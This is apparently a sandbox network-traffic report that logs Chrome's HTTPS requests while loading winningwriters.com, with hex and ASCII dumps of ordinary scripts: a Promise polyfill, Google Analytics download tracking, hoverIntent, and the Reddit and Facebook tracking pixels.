                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 28 74 29 7d 29 29 7d 2c 75 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 61 28 74 29 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 2e 72 61 63 65 20 61 63 63 65 70 74 73 20 61 6e 20 61 72 72 61 79 22 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 75 2e 72 65 73 6f 6c 76 65 28 74 5b 72 5d 29 2e 74 68 65 6e 28 65 2c 6e 29 7d 29 29 7d 2c 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 65 74 49 6d 6d 65 64 69 61 74 65
                                                                                                                                                                                            Data Ascii: turn new u((function(e,n){n(t)}))},u.race=function(t){return new u((function(e,n){if(!a(t))return n(new TypeError("Promise.race accepts an array"));for(var r=0,i=t.length;r<i;r++)u.resolve(t[r]).then(e,n)}))},u._immediateFn="function"==typeof setImmediate
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 68 72 6f 77 22 3d 3d 3d 69 29 74 68 72 6f 77 20 6f 3b 72 65 74 75 72 6e 20 43 28 29 7d 66 6f 72 28 6e 2e 6d 65 74 68 6f 64 3d 69 2c 6e 2e 61 72 67 3d 6f 3b 3b 29 7b 76 61 72 20 61 3d 6e 2e 64 65 6c 65 67 61 74 65 3b 69 66 28 61 29 7b 76 61 72 20 63 3d 67 28 61 2c 6e 29 3b 69 66 28 63 29 7b 69 66 28 63 3d 3d 3d 6c 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 63 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 6e 2e 73 65 6e 74 3d 6e 2e 5f 73 65 6e 74 3d 6e 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 72 29 74 68 72 6f 77 20 72 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 6e 2e 61 72 67 3b 6e 2e 64 69 73 70 61 74 63 68
                                                                                                                                                                                            Data Ascii: hrow"===i)throw o;return C()}for(n.method=i,n.arg=o;;){var a=n.delegate;if(a){var c=g(a,n);if(c){if(c===l)continue;return c}}if("next"===n.method)n.sent=n._sent=n.arg;else if("throw"===n.method){if("suspendedStart"===r)throw r="completed",n.arg;n.dispatch
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 29 7d 28 69 2c 6f 2c 72 2c 61 29 7d 29 29 7d 72 65 74 75 72 6e 20 72 3d 72 3f 72 2e 74 68 65 6e 28 61 2c 61 29 3a 61 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 2e 69 74 65 72 61 74 6f 72 5b 65 2e 6d 65 74 68 6f 64 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 69 66 28 65 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 7b 69 66 28 74 2e 69 74 65 72 61 74 6f 72 2e 72 65 74 75 72 6e 26 26 28 65 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 65 2e 61 72 67 3d 76 6f 69 64 20 30 2c 67 28 74 2c 65 29 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 29 72 65 74 75 72 6e 20 6c 3b 65 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 65 2e 61 72 67 3d 6e 65
                                                                                                                                                                                            Data Ascii: )}(i,o,r,a)}))}return r=r?r.then(a,a):a()}}function g(t,e){var n=t.iterator[e.method];if(void 0===n){if(e.delegate=null,"throw"===e.method){if(t.iterator.return&&(e.method="return",e.arg=void 0,g(t,e),"throw"===e.method))return l;e.method="throw",e.arg=ne
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1378INData Raw: 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 3d 3d 3d 64 7c 7c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3d 3d 3d 28 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 29 29 7d 2c 74 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2c 68 29 3a 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 68 2c 63 28 74 2c 61 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 74 2e 70
                                                                                                                                                                                            Data Ascii: atorFunction=function(t){var e="function"==typeof t&&t.constructor;return!!e&&(e===d||"GeneratorFunction"===(e.displayName||e.name))},t.mark=function(t){return Object.setPrototypeOf?Object.setPrototypeOf(t,h):(t.__proto__=h,c(t,a,"GeneratorFunction")),t.p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            75192.168.2.164980466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC728OUTGET /assets/js/ga-track.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
                                                                                                                                                                                            2024-11-18 20:00:10 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "937-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 2359
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC2359INData Raw: 2f 2a 0a 0a 66 72 6f 6d 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6c 61 73 74 61 6d 2e 63 6f 6d 2f 62 6c 6f 67 2f 69 6e 64 65 78 2e 70 68 70 2f 32 30 31 31 2f 30 34 2f 68 6f 77 2d 74 6f 2d 74 72 61 63 6b 2d 64 6f 77 6e 6c 6f 61 64 73 2d 69 6e 2d 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2f 0a 0a 54 72 61 63 6b 73 20 66 69 6c 65 20 64 6f 77 6e 6c 6f 61 64 73 20 61 73 20 65 76 65 6e 74 73 20 66 6f 72 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 78 74 65 6e 73 69 6f 6e 73 3a 20 2e 7a 69 70 2c 20 2e 65 78 65 2c 20 2e 70 64 66 2c 20 2e 64 6f 63 2c 20 2e 64 6f 63 78 2c 20 2e 78 6c 73 2c 20 2e 78 6c 73 78 2c 20 2e 70 70 74 2c 20 2e 70 70 74 78 2c 20 2e 6d 70 33 20 28 61 67 61 69 6e 20 66 65 65 6c 20 66 72 65 65 20 74 6f 20 6d 6f 64 69 66 79 20 74 68 65
                                                                                                                                                                                            Data Ascii: /*from: http://www.blastam.com/blog/index.php/2011/04/how-to-track-downloads-in-google-analytics/Tracks file downloads as events for the following extensions: .zip, .exe, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .mp3 (again feel free to modify the


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            76192.168.2.1649808151.101.1.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC404OUTGET /ads/conversions-config/v1/pixel/config/t2_11an1ubt_telemetry HTTP/1.1
                                                                                                                                                                                            Host: www.redditstatic.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                            cache-control: max-age=300
                                                                                                                                                                                            content-type: application/json
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            Vary: Accept-Encoding,Origin
                                                                                                                                                                                            Server: snooserv
                                                                                                                                                                                            Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                            NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                            2024-11-18 20:00:10 UTC86INData Raw: 7b 22 76 65 72 73 69 6f 6e 5f 68 61 73 68 22 3a 22 34 39 32 36 37 62 63 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 73 74 61 74 69 63 2e 63 6f 6d 2f 61 64 73 2f 34 39 32 36 37 62 63 65 2f 70 69 78 65 6c 2e 6a 73 22 7d
                                                                                                                                                                                            Data Ascii: {"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            77192.168.2.164980766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC731OUTGET /assets/js/hoverintent.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
                                                                                                                                                                                            2024-11-18 20:00:10 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "c67-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3175
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC3175INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 09 2f 2a 20 68 6f 76 65 72 49 6e 74 65 6e 74 20 62 79 20 42 72 69 61 6e 20 43 68 65 72 6e 65 20 2a 2f 0a 09 24 2e 66 6e 2e 68 6f 76 65 72 49 6e 74 65 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 20 7b 0a 09 09 2f 2f 20 64 65 66 61 75 6c 74 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 73 0a 09 09 76 61 72 20 63 66 67 20 3d 20 7b 0a 09 09 09 73 65 6e 73 69 74 69 76 69 74 79 3a 20 37 2c 0a 09 09 09 69 6e 74 65 72 76 61 6c 3a 20 31 30 30 2c 0a 09 09 09 74 69 6d 65 6f 75 74 3a 20 30 0a 09 09 7d 3b 0a 09 09 2f 2f 20 6f 76 65 72 72 69 64 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 73 20 77 69 74 68 20 75 73 65 72 20 73 75 70 70 6c 69 65 64 20 6f 62 6a 65 63 74 0a 09 09 63
                                                                                                                                                                                            Data Ascii: (function($){/* hoverIntent by Brian Cherne */$.fn.hoverIntent = function(f,g) {// default configuration optionsvar cfg = {sensitivity: 7,interval: 100,timeout: 0};// override configuration options with user supplied objectc


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            78192.168.2.1649811151.101.65.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC372OUTGET /pixels/t2_11an1ubt/config HTTP/1.1
                                                                                                                                                                                            Host: pixel-config.reddit.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 27
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                            2024-11-18 20:00:10 UTC27INData Raw: 1f 8b 08 00 00 00 00 00 00 ff aa ae e5 02 04 00 00 ff ff 06 b0 a1 dd 03 00 00 00
                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            79192.168.2.1649805157.240.0.64436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1203OUTGET /signals/config/188856481728275?v=2.9.177&r=stable&domain=winningwriters.com&hme=c3e4904c1dde42d643265ef909b9e193c41cedcd6f559a3ff5e1b178e36647fa&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                            Host: connect.facebook.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                            report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                            content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-Jq5t2IUa' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                            document-policy: force-load-at-top
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                            Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1INData Raw: 2f
                                                                                                                                                                                            Data Ascii: /
                                                                                                                                                                                            2024-11-18 20:00:10 UTC13813INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                            Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                            2024-11-18 20:00:10 UTC16384INData Raw: 72 6f 74 6f 74 79 70 65 3a 22 40 40 70 72 6f 74 6f 74 79 70 65 22 29 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26
                                                                                                                                                                                            Data Ascii: rototype:"@@prototype")?"symbol":typeof a};function i(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function j(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&
                                                                                                                                                                                            2024-11-18 20:00:10 UTC16384INData Raw: 65 57 61 72 6e 28 22 5b 66 62 70 69 78 65 6c 5d 20 22 2b 64 2e 69 64 2b 22 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 47 6f 20 74 6f 20 45 76 65 6e 74 73 20 4d 61 6e 61 67 65 72 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 22 29 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 70 72 6f 68 69 62 69 74 65 64 73 6f 75 72 63 65 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 70 72 6f 68 69 62 69 74 65
                                                                                                                                                                                            Data Ascii: eWarn("[fbpixel] "+d.id+" is unavailable. Go to Events Manager to learn more"))})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.prohibitedsources");f.registerPlugin&&f.registerPlugin("fbevents.plugins.prohibite
                                                                                                                                                                                            2024-11-18 20:00:10 UTC16384INData Raw: 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22
                                                                                                                                                                                            Data Ascii: les[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugins.estruleengine",function(){return function(g,b,c,d){var e={exports:{}};e.exports;(function(){"use strict"
